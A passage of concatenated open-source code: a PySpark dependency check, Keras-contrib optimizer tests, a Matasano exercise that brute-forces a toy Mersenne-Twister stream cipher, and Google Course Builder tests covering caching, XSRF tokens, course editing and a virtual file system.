        import pyarrow
    except ImportError as error:
        # pyarrow is missing entirely.
        raise ImportError(
            "PyArrow >= %s must be installed; however, "
            "it was not found." % minimum_pyarrow_version
        ) from error
    # pyarrow is present; verify it is recent enough.
    if LooseVersion(pyarrow.__version__) < LooseVersion(minimum_pyarrow_version):
        raise ImportError(
            "PyArrow >= %s must be installed; however, "
            "your version was %s." % (minimum_pyarrow_version, pyarrow.__version__)
        )
    # The pre-0.15 legacy IPC wire format is explicitly unsupported.
    if os.environ.get("ARROW_PRE_0_15_IPC_FORMAT", "0") == "1":
        raise RuntimeError(
            "Arrow legacy IPC format is not supported in PySpark, "
            "please unset ARROW_PRE_0_15_IPC_FORMAT"
        )
| ueshin/apache-spark | python/pyspark/sql/pandas/utils.py | Python | apache-2.0 | 2,779 |
from __future__ import print_function
import numpy as np
from keras_contrib.utils import test_utils
from keras import optimizers
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.utils import to_categorical
def get_test_data():
    """Return a small, deterministic binary-classification training set.

    The numpy seed is fixed so every optimizer test trains on identical
    data; labels are one-hot encoded.
    """
    np.random.seed(1337)
    train, _ = test_utils.get_test_data(num_train=1000,
                                        num_test=200,
                                        input_shape=(10,),
                                        classification=True,
                                        num_classes=2)
    x_train, y_train = train
    return x_train, to_categorical(y_train)
def get_model(input_dim, num_hidden, output_dim):
    """Build an uncompiled one-hidden-layer softmax classifier."""
    layers = [
        Dense(num_hidden, input_shape=(input_dim,)),
        Activation('relu'),
        Dense(output_dim),
        Activation('softmax'),
    ]
    model = Sequential()
    for layer in layers:
        model.add(layer)
    return model
def _test_optimizer(optimizer, target=0.75):
    """Smoke-test an optimizer: train briefly, then round-trip serialize it.

    Asserts that two epochs of training reach at least *target* accuracy
    and that serialize -> deserialize -> serialize is the identity on the
    optimizer's config.
    """
    x_train, y_train = get_test_data()
    model = get_model(x_train.shape[1], 10, y_train.shape[1])
    model.compile(loss='categorical_crossentropy',
                  optimizer=optimizer,
                  metrics=['accuracy'])
    history = model.fit(x_train, y_train, epochs=2, batch_size=16, verbose=0)
    assert history.history['acc'][-1] >= target
    # Serialization round-trip must preserve the optimizer config exactly.
    config = optimizers.serialize(optimizer)
    custom_objects = {optimizer.__class__.__name__: optimizer.__class__}
    optim = optimizers.deserialize(config, custom_objects)
    new_config = optimizers.serialize(optim)
    assert config == new_config
| keras-team/keras-contrib | keras_contrib/tests/optimizers.py | Python | mit | 1,627 |
import math
import statistics
import challenge21 as mt
from util import xor, chunk
def mtcipherop(data, key):
    """Encrypt or decrypt *data* with an MT19937 keystream seeded by *key*.

    The operation is its own inverse (XOR stream cipher); *key* must fit
    in 16 bits.
    """
    assert key < 2**16
    mt.seed(key)
    result = bytearray()
    for piece in chunk(data, 4):
        keystream = mt.extract().to_bytes(4, 'little')
        # The final chunk may be short; truncate the keystream to match.
        result += xor(piece, keystream[:len(piece)])
    return result
def breakmtcipher(ciphertext):
    """Brute-force the 16-bit MT seed of *ciphertext*.

    Keeps the candidate plaintext whose byte values have the lowest
    population standard deviation, then prints that deviation and the
    guessed plaintext.
    """
    best_dev = 10000
    best_plaintext = b''
    for key in range(2**16):
        print(key)
        candidate = mtcipherop(ciphertext, key)
        dev = statistics.pstdev(candidate)
        if dev < best_dev:
            best_dev = dev
            best_plaintext = candidate
    print(best_dev)
    print(best_plaintext)
def main():
    """Demo: encrypt a known plaintext under seed 10, then brute-force it."""
    secret = mtcipherop(b'Brown fox jumped over a log or something', 10)
    breakmtcipher(secret)
# Run the demo only when executed as a script, not on import.
if __name__ == '__main__':
    main()
| cngkaygusuz/matasano-challenges | challenge24.py | Python | mit | 847 |
# coding: utf-8
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that walk through Course Builder pages."""
__author__ = 'Sean Lip'
import __builtin__
import copy
import cStringIO
import csv
import datetime
import logging
import os
import re
import shutil
import sys
import time
import urllib
import zipfile
import appengine_config
from controllers import lessons
from controllers import sites
from controllers import utils
from controllers.utils import XsrfTokenManager
from models import config
from models import courses
from models import jobs
from models import models
from models import transforms
from models import vfs
from models.courses import Course
import modules.admin.admin
from modules.announcements.announcements import AnnouncementEntity
import modules.oeditor.oeditor
from tools.etl import etl
from tools.etl import etl_lib
from tools.etl import examples
from tools.etl import remote
from webtest.app import AppError
import actions
from actions import assert_contains
from actions import assert_contains_all_of
from actions import assert_does_not_contain
from actions import assert_equals
from controllers_review import PeerReviewControllerTest
from controllers_review import PeerReviewDashboardTest
from review_stats import PeerReviewAnalyticsTest
from google.appengine.api import memcache
from google.appengine.api import namespace_manager
from google.appengine.ext import db
# A number of data files in a test course.
COURSE_FILE_COUNT = 70
# There is an expectation in our tests of automatic import of data/*.csv files,
# which is achieved below by selecting an alternative factory method.
# NOTE: this monkey-patch is module-level and therefore applies for the
# whole test run, not just this file's test cases.
courses.Course.create_new_default_course = (
    courses.Course.custom_new_default_course_for_test)
class InfrastructureTest(actions.TestBase):
"""Test core infrastructure classes agnostic to specific user roles."""
    def test_value_cached_in_one_namespace_invisible_in_another(self):
        """Value cached in one namespace is not visible in another."""
        # Each block switches namespace inside try/finally so the original
        # namespace is always restored, even if an assertion fails.
        # set value and check it's visible in one namespace
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace('test_memcache_manager_a')
            models.MemcacheManager.set('foo', 'bar')
            assert 'bar' == models.MemcacheManager.get('foo')
        finally:
            namespace_manager.set_namespace(old_namespace)
        # check same value is not visible in another namespace
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace('test_memcache_manager_b')
            assert not models.MemcacheManager.get('foo')
        finally:
            namespace_manager.set_namespace(old_namespace)
        # check same value is not visible in default namespace
        assert not models.MemcacheManager.get('foo')
        # check same value is not visible in None namespace
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace(None)
            assert not models.MemcacheManager.get('foo')
        finally:
            namespace_manager.set_namespace(old_namespace)
        # set value and check it's visible in default namespace
        models.MemcacheManager.set('foo', 'bar')
        assert 'bar' == models.MemcacheManager.get('foo')
        # check value is not visible in another namespace
        old_namespace = namespace_manager.get_namespace()
        try:
            namespace_manager.set_namespace('test_memcache_manager_c')
            assert not models.MemcacheManager.get('foo')
        finally:
            namespace_manager.set_namespace(old_namespace)
def test_response_content_type_is_application_json_in_utf_8(self):
response = self.testapp.get(
'/rest/config/item?key=gcb_config_update_interval_sec')
self.assertEqual(
'application/javascript; charset=utf-8',
response.headers['Content-Type'])
    def test_xsrf_token_manager(self):
        """Test XSRF token operations.

        Covers issuing/validating tokens for anonymous and real users,
        rejection of a forged timestamp, and rejection of an expired token.
        """
        # os.environ['AUTH_DOMAIN'] = 'test_domain'
        # os.environ['APPLICATION_ID'] = 'test app'
        # Issues and verify anonymous user token.
        action = 'test-action'
        token = utils.XsrfTokenManager.create_xsrf_token(action)
        assert '/' in token
        assert utils.XsrfTokenManager.is_xsrf_token_valid(token, action)
        # Impersonate real user.
        os.environ['USER_EMAIL'] = 'test_email'
        os.environ['USER_ID'] = 'test_id'
        # Issues and verify real user token.
        action = 'test-action'
        token = utils.XsrfTokenManager.create_xsrf_token(action)
        assert '/' in token
        assert utils.XsrfTokenManager.is_xsrf_token_valid(token, action)
        # Check forged time stamp invalidates token.
        # Tokens are '<timestamp>/<signature>'; bumping the timestamp must
        # break the signature check.
        parts = token.split('/')
        assert len(parts) == 2
        forgery = '%s/%s' % (long(parts[0]) + 1000, parts[1])
        assert forgery != token
        assert not utils.XsrfTokenManager.is_xsrf_token_valid(forgery, action)
        # Check token properly expires.
        action = 'test-action'
        time_in_the_past = long(
            time.time() - utils.XsrfTokenManager.XSRF_TOKEN_AGE_SECS)
        # pylint: disable-msg=protected-access
        old_token = utils.XsrfTokenManager._create_token(
            action, time_in_the_past)
        assert not utils.XsrfTokenManager.is_xsrf_token_valid(old_token, action)
        # Clean up.
        # del os.environ['APPLICATION_ID']
        # del os.environ['AUTH_DOMAIN']
        del os.environ['USER_EMAIL']
        del os.environ['USER_ID']
    def test_import_course(self):
        """Tests importing one course into another.

        Imports a 1.2-format course into an empty 1.3 course, then that
        result into a second 1.3 course, and finally verifies unit deletion
        also removes the course's asset files.
        """
        # Setup courses.
        sites.setup_courses('course:/a::ns_a, course:/b::ns_b, course:/:/')
        # Validate the courses before import.
        all_courses = sites.get_all_courses()
        dst_app_context_a = all_courses[0]
        dst_app_context_b = all_courses[1]
        src_app_context = all_courses[2]
        dst_course_a = courses.Course(None, app_context=dst_app_context_a)
        dst_course_b = courses.Course(None, app_context=dst_app_context_b)
        src_course = courses.Course(None, app_context=src_app_context)
        assert not dst_course_a.get_units()
        assert not dst_course_b.get_units()
        assert 12 == len(src_course.get_units())
        # Import 1.2 course into 1.3.
        errors = []
        src_course_out, dst_course_out_a = dst_course_a.import_from(
            src_app_context, errors)
        if errors:
            raise Exception(errors)
        assert len(
            src_course.get_units()) == len(src_course_out.get_units())
        assert len(
            src_course_out.get_units()) == len(dst_course_out_a.get_units())
        # Import 1.3 course into 1.3.
        errors = []
        src_course_out_a, dst_course_out_b = dst_course_b.import_from(
            dst_app_context_a, errors)
        if errors:
            raise Exception(errors)
        assert src_course_out_a.get_units() == dst_course_out_b.get_units()
        # Test delete.
        units_to_delete = dst_course_a.get_units()
        deleted_count = 0
        for unit in units_to_delete:
            assert dst_course_a.delete_unit(unit)
            deleted_count += 1
        dst_course_a.save()
        assert deleted_count == len(units_to_delete)
        assert not dst_course_a.get_units()
        assert not dst_course_a.app_context.fs.list(os.path.join(
            dst_course_a.app_context.get_home(), 'assets/js/'))
        # Clean up.
        sites.reset_courses()
    def test_create_new_course(self):
        """Tests creating a new course.

        End-to-end exercise of the course-authoring model: adding/updating
        units, assessments and lessons; reordering and moving lessons;
        public/private visibility of assessments and activities over HTTP;
        and cascading deletion of child objects and asset files.
        """
        # Setup courses.
        sites.setup_courses('course:/test::ns_test, course:/:/')
        # Add several units.
        course = courses.Course(None, app_context=sites.get_all_courses()[0])
        link = course.add_link()
        unit = course.add_unit()
        assessment = course.add_assessment()
        course.save()
        assert course.find_unit_by_id(link.unit_id)
        assert course.find_unit_by_id(unit.unit_id)
        assert course.find_unit_by_id(assessment.unit_id)
        assert 3 == len(course.get_units())
        assert assessment.unit_id == 3
        # Check unit can be found.
        assert unit == course.find_unit_by_id(unit.unit_id)
        assert not course.find_unit_by_id(999)
        # Update unit.
        unit.title = 'Test Title'
        course.update_unit(unit)
        course.save()
        assert 'Test Title' == course.find_unit_by_id(unit.unit_id).title
        # Update assessment.
        assessment_content = open(os.path.join(
            appengine_config.BUNDLE_ROOT,
            'assets/js/assessment-Pre.js'), 'rb').readlines()
        assessment_content = u''.join(assessment_content)
        errors = []
        course.set_assessment_content(assessment, assessment_content, errors)
        course.save()
        assert not errors
        # Assessment content must round-trip through the virtual filesystem.
        assessment_content_stored = course.app_context.fs.get(os.path.join(
            course.app_context.get_home(),
            course.get_assessment_filename(assessment.unit_id)))
        assert assessment_content == assessment_content_stored
        # Test adding lessons.
        lesson_a = course.add_lesson(unit)
        lesson_b = course.add_lesson(unit)
        lesson_c = course.add_lesson(unit)
        course.save()
        assert [lesson_a, lesson_b, lesson_c] == course.get_lessons(
            unit.unit_id)
        assert lesson_c.lesson_id == 6
        # Reorder lessons.
        new_order = [
            {'id': link.unit_id},
            {
                'id': unit.unit_id,
                'lessons': [
                    {'id': lesson_b.lesson_id},
                    {'id': lesson_a.lesson_id},
                    {'id': lesson_c.lesson_id}]},
            {'id': assessment.unit_id}]
        course.reorder_units(new_order)
        course.save()
        assert [lesson_b, lesson_a, lesson_c] == course.get_lessons(
            unit.unit_id)
        # Move lesson to another unit.
        another_unit = course.add_unit()
        course.move_lesson_to(lesson_b, another_unit)
        course.save()
        assert [lesson_a, lesson_c] == course.get_lessons(unit.unit_id)
        assert [lesson_b] == course.get_lessons(another_unit.unit_id)
        course.delete_unit(another_unit)
        course.save()
        # Make the course available.
        # Monkey-patch get_environ so the course as a whole is public;
        # restored at the end of the test.
        get_environ_old = sites.ApplicationContext.get_environ
        def get_environ_new(self):
            environ = get_environ_old(self)
            environ['course']['now_available'] = True
            return environ
        sites.ApplicationContext.get_environ = get_environ_new
        # Test public/private assessment.
        assessment_url = (
            '/test/' + course.get_assessment_filename(assessment.unit_id))
        assert not assessment.now_available
        response = self.get(assessment_url, expect_errors=True)
        assert_equals(response.status_int, 403)
        assessment = course.find_unit_by_id(assessment.unit_id)
        assessment.now_available = True
        course.update_unit(assessment)
        course.save()
        response = self.get(assessment_url)
        assert_equals(response.status_int, 200)
        # Check delayed assessment deletion.
        # Deletion only takes effect on save(); until then the file serves.
        course.delete_unit(assessment)
        response = self.get(assessment_url)  # note: file is still available
        assert_equals(response.status_int, 200)
        course.save()
        response = self.get(assessment_url, expect_errors=True)
        assert_equals(response.status_int, 404)
        # Test public/private activity.
        lesson_a = course.find_lesson_by_id(None, lesson_a.lesson_id)
        lesson_a.now_available = False
        lesson_a.has_activity = True
        course.update_lesson(lesson_a)
        errors = []
        course.set_activity_content(lesson_a, u'var activity = []', errors)
        assert not errors
        activity_url = (
            '/test/' + course.get_activity_filename(None, lesson_a.lesson_id))
        response = self.get(activity_url, expect_errors=True)
        assert_equals(response.status_int, 403)
        lesson_a = course.find_lesson_by_id(None, lesson_a.lesson_id)
        lesson_a.now_available = True
        course.update_lesson(lesson_a)
        course.save()
        response = self.get(activity_url)
        assert_equals(response.status_int, 200)
        # Check delayed activity.
        course.delete_lesson(lesson_a)
        response = self.get(activity_url)  # note: file is still available
        assert_equals(response.status_int, 200)
        course.save()
        response = self.get(activity_url, expect_errors=True)
        assert_equals(response.status_int, 404)
        # Test deletes removes all child objects.
        course.delete_unit(link)
        course.delete_unit(unit)
        assert not course.delete_unit(assessment)
        course.save()
        assert not course.get_units()
        assert not course.app_context.fs.list(os.path.join(
            course.app_context.get_home(), 'assets/js/'))
        # Clean up.
        sites.ApplicationContext.get_environ = get_environ_old
        sites.reset_courses()
def test_unit_lesson_not_available(self):
    """Tests that unavailable units and lessons behave correctly.

    Builds a course containing every availability combination of units
    and lessons, then walks the pages twice: once as a student (private
    content must be hidden or redirected away) and once as an admin
    (private content is rendered, marked with the private tag).
    """
    # Setup a new course.
    sites.setup_courses('course:/test::ns_test, course:/:/')
    self.base = '/test'
    config.Registry.test_overrides[models.CAN_USE_MEMCACHE.name] = True
    app_context = sites.get_all_courses()[0]
    course = courses.Course(None, app_context=app_context)

    # Add a unit that is not available.
    unit_1 = course.add_unit()
    unit_1.now_available = False
    lesson_1_1 = course.add_lesson(unit_1)
    lesson_1_1.title = 'Lesson 1.1'
    course.update_unit(unit_1)

    # Add a unit with some lessons available and some lessons not available.
    unit_2 = course.add_unit()
    unit_2.now_available = True
    lesson_2_1 = course.add_lesson(unit_2)
    lesson_2_1.title = 'Lesson 2.1'
    lesson_2_1.now_available = False
    lesson_2_2 = course.add_lesson(unit_2)
    lesson_2_2.title = 'Lesson 2.2'
    lesson_2_2.now_available = True
    course.update_unit(unit_2)

    # Add a unit with all lessons not available.
    unit_3 = course.add_unit()
    unit_3.now_available = True
    lesson_3_1 = course.add_lesson(unit_3)
    lesson_3_1.title = 'Lesson 3.1'
    lesson_3_1.now_available = False
    course.update_unit(unit_3)

    # Add a unit that is available.
    unit_4 = course.add_unit()
    unit_4.now_available = True
    lesson_4_1 = course.add_lesson(unit_4)
    lesson_4_1.title = 'Lesson 4.1'
    lesson_4_1.now_available = True
    course.update_unit(unit_4)

    # Add an available unit with no lessons.
    unit_5 = course.add_unit()
    unit_5.now_available = True
    course.update_unit(unit_5)
    course.save()

    # Sanity-check that each unit reports exactly the lessons added above.
    assert [lesson_1_1] == course.get_lessons(unit_1.unit_id)
    assert [lesson_2_1, lesson_2_2] == course.get_lessons(unit_2.unit_id)
    assert [lesson_3_1] == course.get_lessons(unit_3.unit_id)

    # Make the course itself available by monkey-patching get_environ;
    # the original method is restored at the end of the test.
    get_environ_old = sites.ApplicationContext.get_environ

    def get_environ_new(self):
        environ = get_environ_old(self)
        environ['course']['now_available'] = True
        return environ

    sites.ApplicationContext.get_environ = get_environ_new

    # Markup emitted only when an admin views a private lesson.
    private_tag = 'id="lesson-title-private"'

    # Simulate a student traversing the course.
    email = 'test_unit_lesson_not_available@example.com'
    name = 'Test Unit Lesson Not Available'
    actions.login(email, is_admin=False)
    actions.register(self, name)

    # Accessing a unit that is not available redirects to the main page.
    response = self.get('unit?unit=%s' % unit_1.unit_id)
    assert_equals(response.status_int, 302)

    # Unit 2: the unavailable first lesson shows a placeholder message.
    response = self.get('unit?unit=%s' % unit_2.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 2.1', response.body)
    assert_contains('This lesson is not available.', response.body)
    assert_does_not_contain(private_tag, response.body)

    # Unit 2, second lesson: available, renders normally.
    response = self.get('unit?unit=%s&lesson=%s' % (
        unit_2.unit_id, lesson_2_2.lesson_id))
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 2.2', response.body)
    assert_does_not_contain('This lesson is not available.', response.body)
    assert_does_not_contain(private_tag, response.body)

    # Unit 3: its only lesson is unavailable.
    response = self.get('unit?unit=%s' % unit_3.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 3.1', response.body)
    assert_contains('This lesson is not available.', response.body)
    assert_does_not_contain(private_tag, response.body)

    # Unit 4: fully available.
    response = self.get('unit?unit=%s' % unit_4.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 4.1', response.body)
    assert_does_not_contain('This lesson is not available.', response.body)
    assert_does_not_contain(private_tag, response.body)

    # Unit 5: available but empty.
    response = self.get('unit?unit=%s' % unit_5.unit_id)
    assert_equals(response.status_int, 200)
    assert_does_not_contain('Lesson', response.body)
    assert_contains(
        'This unit does not contain any lessons.', response.body)
    assert_does_not_contain(private_tag, response.body)

    actions.logout()

    # Simulate an admin traversing the course.
    email = 'test_unit_lesson_not_available@example.com_admin'
    name = 'Test Unit Lesson Not Available Admin'
    actions.login(email, is_admin=True)
    actions.register(self, name)

    # The course admin can access a unit that is not available.
    response = self.get('unit?unit=%s' % unit_1.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 1.1', response.body)

    # Unavailable lessons render for the admin, marked with private_tag.
    response = self.get('unit?unit=%s' % unit_2.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 2.1', response.body)
    assert_does_not_contain('This lesson is not available.', response.body)
    assert_contains(private_tag, response.body)

    response = self.get('unit?unit=%s&lesson=%s' % (
        unit_2.unit_id, lesson_2_2.lesson_id))
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 2.2', response.body)
    assert_does_not_contain('This lesson is not available.', response.body)
    assert_does_not_contain(private_tag, response.body)

    response = self.get('unit?unit=%s' % unit_3.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 3.1', response.body)
    assert_does_not_contain('This lesson is not available.', response.body)
    assert_contains(private_tag, response.body)

    response = self.get('unit?unit=%s' % unit_4.unit_id)
    assert_equals(response.status_int, 200)
    assert_contains('Lesson 4.1', response.body)
    assert_does_not_contain('This lesson is not available.', response.body)
    assert_does_not_contain(private_tag, response.body)

    response = self.get('unit?unit=%s' % unit_5.unit_id)
    assert_equals(response.status_int, 200)
    assert_does_not_contain('Lesson', response.body)
    assert_contains(
        'This unit does not contain any lessons.', response.body)
    assert_does_not_contain(private_tag, response.body)

    actions.logout()

    # Clean up app_context.
    sites.ApplicationContext.get_environ = get_environ_old
def test_custom_assessments(self):
    """Tests that custom assessments are evaluated correctly.

    Creates two zero-weight assessments, submits scores for them, and
    verifies the per-assessment scores, the weighted overall score, the
    student profile page, and that re-submitting a lower score never
    lowers a recorded score.
    """

    def read_asset(filename):
        # Read a bundled asset as one unicode string; the handle is
        # closed promptly (the previous code leaked it via
        # open(...).readlines() with no close).
        path = os.path.join(appengine_config.BUNDLE_ROOT, filename)
        with open(path, 'rb') as stream:
            return u''.join(stream.readlines())

    # Setup a new course.
    sites.setup_courses('course:/test::ns_test, course:/:/')
    self.base = '/test'
    self.namespace = 'ns_test'
    config.Registry.test_overrides[models.CAN_USE_MEMCACHE.name] = True
    app_context = sites.get_all_courses()[0]
    course = courses.Course(None, app_context=app_context)
    email = 'test_assessments@google.com'
    name = 'Test Assessments'

    # Two available assessments, both initially weightless.
    assessment_1 = course.add_assessment()
    assessment_1.title = 'first'
    assessment_1.now_available = True
    assessment_1.weight = 0
    assessment_2 = course.add_assessment()
    assessment_2.title = 'second'
    assessment_2.now_available = True
    assessment_2.weight = 0
    course.save()
    assert course.find_unit_by_id(assessment_1.unit_id)
    assert course.find_unit_by_id(assessment_2.unit_id)
    assert 2 == len(course.get_units())

    # Make the course available; the original get_environ is restored at
    # the end of the test.
    get_environ_old = sites.ApplicationContext.get_environ

    def get_environ_new(self):
        environ = get_environ_old(self)
        environ['course']['now_available'] = True
        return environ

    sites.ApplicationContext.get_environ = get_environ_new

    first = {'score': '1.00', 'assessment_type': assessment_1.unit_id}
    second = {'score': '3.00', 'assessment_type': assessment_2.unit_id}

    # Update assessment 1.
    errors = []
    course.set_assessment_content(
        assessment_1, read_asset('assets/js/assessment-Pre.js'), errors)
    course.save()
    assert not errors

    # Update assessment 2.
    errors = []
    course.set_assessment_content(
        assessment_2, read_asset('assets/js/assessment-Mid.js'), errors)
    course.save()
    assert not errors

    # Register.
    actions.login(email)
    actions.register(self, name)

    # Submit assessment 1.
    actions.submit_assessment(self, assessment_1.unit_id, first)
    student = models.StudentProfileDAO.get_enrolled_student_by_email_for(
        email, app_context)
    student_scores = course.get_all_scores(student)
    assert len(student_scores) == 2
    assert student_scores[0]['id'] == str(assessment_1.unit_id)
    assert student_scores[0]['score'] == 1
    assert student_scores[0]['title'] == 'first'
    assert student_scores[0]['weight'] == 0
    # The unsubmitted assessment still appears, with a zero score.
    assert student_scores[1]['id'] == str(assessment_2.unit_id)
    assert student_scores[1]['score'] == 0
    assert student_scores[1]['title'] == 'second'
    assert student_scores[1]['weight'] == 0

    # The overall score is None if there are no weights assigned to any of
    # the assessments.
    overall_score = course.get_overall_score(student)
    assert overall_score is None

    # View the student profile page; no overall score is shown yet.
    response = self.get('student/home')
    assert_does_not_contain('Overall course score', response.body)

    # Add a weight to the first assessment.
    assessment_1.weight = 10
    overall_score = course.get_overall_score(student)
    assert overall_score == 1

    # Submit assessment 2.
    actions.submit_assessment(self, assessment_2.unit_id, second)
    # We need to reload the student instance, because its properties have
    # changed.
    student = models.StudentProfileDAO.get_enrolled_student_by_email_for(
        email, app_context)
    student_scores = course.get_all_scores(student)
    assert len(student_scores) == 2
    assert student_scores[1]['score'] == 3
    # Assessment 2 still has zero weight, so the overall score is unmoved.
    overall_score = course.get_overall_score(student)
    assert overall_score == 1

    # Change the weight of assessment 2; overall is the weighted mean.
    assessment_2.weight = 30
    overall_score = course.get_overall_score(student)
    assert overall_score == int((1 * 10 + 3 * 30) / 40)

    # Save all changes.
    course.save()

    # View the student profile page.
    response = self.get('student/home')
    assert_contains('assessment-score-first">1</span>', response.body)
    assert_contains('assessment-score-second">3</span>', response.body)
    assert_contains('Overall course score', response.body)
    assert_contains('assessment-score-overall">2</span>', response.body)

    # Submitting a lower score for any assessment does not change any of
    # the scores, since the system records the maximum score that has ever
    # been achieved on any assessment.
    first_retry = {'score': '0', 'assessment_type': assessment_1.unit_id}
    actions.submit_assessment(self, assessment_1.unit_id, first_retry)
    student = models.StudentProfileDAO.get_enrolled_student_by_email_for(
        email, app_context)
    student_scores = course.get_all_scores(student)
    assert len(student_scores) == 2
    assert student_scores[0]['id'] == str(assessment_1.unit_id)
    assert student_scores[0]['score'] == 1
    overall_score = course.get_overall_score(student)
    assert overall_score == int((1 * 10 + 3 * 30) / 40)

    actions.logout()

    # Clean up app_context.
    sites.ApplicationContext.get_environ = get_environ_old
def test_datastore_backed_file_system(self):
    """Tests datastore-backed file system operations.

    Exercises put/open/read/delete/isfile/list on the virtual file
    system, including draft flags and non-ASCII text round-trips.
    """
    fs = vfs.AbstractFileSystem(vfs.DatastoreBackedFileSystem('', '/'))

    # Check binary file. Local file handles are opened via 'with' so
    # they are closed promptly (the previous code leaked four handles).
    src = os.path.join(appengine_config.BUNDLE_ROOT, 'course.yaml')
    dst = os.path.join('/', 'course.yaml')
    with open(src, 'rb') as stream:
        fs.put(dst, stream)
    # Read the reference bytes once for both assertions below.
    with open(src, 'rb') as stream:
        src_bytes = stream.read()
    stored = fs.open(dst)
    assert stored.metadata.size == len(src_bytes)
    assert not stored.metadata.is_draft
    assert stored.read() == src_bytes

    # Check draft.
    with open(src, 'rb') as stream:
        fs.put(dst, stream, is_draft=True)
    stored = fs.open(dst)
    assert stored.metadata.is_draft

    # Check text files with non-ASCII characters and encoding.
    foo_js = os.path.join('/', 'assets/js/foo.js')
    foo_text = u'This is a test text (тест данные).'
    fs.put(foo_js, vfs.string_to_stream(foo_text))
    stored = fs.open(foo_js)
    assert vfs.stream_to_string(stored) == foo_text

    # Check delete.
    del_file = os.path.join('/', 'memcache.test')
    fs.put(del_file, vfs.string_to_stream(u'test'))
    assert fs.isfile(del_file)
    fs.delete(del_file)
    assert not fs.isfile(del_file)

    # Check open or delete of non-existent does not fail.
    assert not fs.open('/foo/bar/baz')
    assert not fs.delete('/foo/bar/baz')

    # Check new content fully overrides old (with and without memcache).
    test_file = os.path.join('/', 'memcache.test')
    fs.put(test_file, vfs.string_to_stream(u'test text'))
    stored = fs.open(test_file)
    assert u'test text' == vfs.stream_to_string(stored)
    fs.delete(test_file)

    # Check file existence.
    assert not fs.isfile('/foo/bar')
    assert fs.isfile('/course.yaml')
    assert fs.isfile('/assets/js/foo.js')

    # Check file listing.
    bar_js = os.path.join('/', 'assets/js/bar.js')
    fs.put(bar_js, vfs.string_to_stream(foo_text))
    baz_js = os.path.join('/', 'assets/js/baz.js')
    fs.put(baz_js, vfs.string_to_stream(foo_text))
    assert fs.list('/') == sorted([
        u'/course.yaml',
        u'/assets/js/foo.js', u'/assets/js/bar.js', u'/assets/js/baz.js'])
    assert fs.list('/assets') == sorted([
        u'/assets/js/foo.js', u'/assets/js/bar.js', u'/assets/js/baz.js'])
    assert not fs.list('/foo/bar')
def test_utf8_datastore(self):
    """Test writing to and reading from datastore using UTF-8 content."""
    utf8_payload = u'Test Data (тест данные)'
    original = models.EventEntity()
    original.source = 'test-source'
    original.user_id = 'test-user-id'
    original.data = utf8_payload
    original.put()
    # Fetch the entity back by id; the text must survive the round trip.
    fetched = models.EventEntity().get_by_id([original.key().id()])
    assert len(fetched) == 1
    assert fetched[0].data == original.data
def assert_queriable(self, entity, name, date_type=datetime.datetime):
    """Create some entities and check that single-property queries work.

    Args:
        entity: db.Model subclass to populate and query.
        name: name of the date/datetime property under test.
        date_type: constructor for the property values
            (datetime.date or datetime.datetime).
    """
    for i in range(1, 32):
        # Bug fix: date_type is itself a class, so the previous
        # date_type.__class__.__name__ always evaluated to 'type';
        # use the class's own name to build distinct, readable keys.
        item = entity(
            key_name='%s_%s' % (date_type.__name__, i))
        setattr(item, name, date_type(2012, 1, i))
        item.put()
    # Descending order.
    items = entity.all().order('-%s' % name).fetch(1000)
    assert len(items) == 31
    assert getattr(items[0], name) == date_type(2012, 1, 31)
    # Ascending order.
    items = entity.all().order('%s' % name).fetch(1000)
    assert len(items) == 31
    assert getattr(items[0], name) == date_type(2012, 1, 1)
def test_indexed_properties(self):
    """Test whether entities support specific query types."""
    # Every persistent entity's 'DateProperty'/'DateTimeProperty' must be
    # indexed — even when the application itself never runs a query that
    # needs the index. The index is what makes bulk data download and
    # incremental computation practical: with it, a table can be processed
    # in daily or weekly chunks and newly arrived data is easy to query
    # for. Without it, the only ordering is the primary index, which
    # cannot separate recently added/modified rows from the rest of the
    # data. The index adds to the cost of datastore writes, but we
    # consider that a worthwhile trade. The checks below verify that all
    # persistent date/datetime properties are queriable, i.e. indexed.
    indexed_date_properties = [
        (AnnouncementEntity, 'date', datetime.date),
        (models.EventEntity, 'recorded_on', datetime.datetime),
        (models.Student, 'enrolled_on', datetime.datetime),
        (models.StudentAnswersEntity, 'updated_on', datetime.datetime),
        (jobs.DurableJobEntity, 'updated_on', datetime.datetime),
    ]
    for entity_class, property_name, property_type in indexed_date_properties:
        self.assert_queriable(
            entity_class, property_name, date_type=property_type)
def test_config_visible_from_any_namespace(self):
    """Test that ConfigProperty is visible from any namespace."""
    # With no override in place, the property reports its default.
    assert (
        config.UPDATE_INTERVAL_SEC.value ==
        config.UPDATE_INTERVAL_SEC.default_value)
    overridden_value = config.UPDATE_INTERVAL_SEC.default_value + 5
    # Install a datastore override for this known property.
    override = config.ConfigPropertyEntity(
        key_name=config.UPDATE_INTERVAL_SEC.name)
    override.value = str(overridden_value)
    override.is_draft = False
    override.put()
    # Force a registry refresh; the override must win in the default
    # namespace.
    config.Registry.last_update_time = 0
    assert config.UPDATE_INTERVAL_SEC.value == overridden_value
    # The same override must also be visible from an unrelated namespace.
    saved_namespace = namespace_manager.get_namespace()
    try:
        namespace_manager.set_namespace(
            'ns-test_config_visible_from_any_namespace')
        config.Registry.last_update_time = 0
        assert config.UPDATE_INTERVAL_SEC.value == overridden_value
    finally:
        namespace_manager.set_namespace(saved_namespace)
class AdminAspectTest(actions.TestBase):
    """Test site from the Admin perspective."""

    def test_courses_page_for_multiple_courses(self):
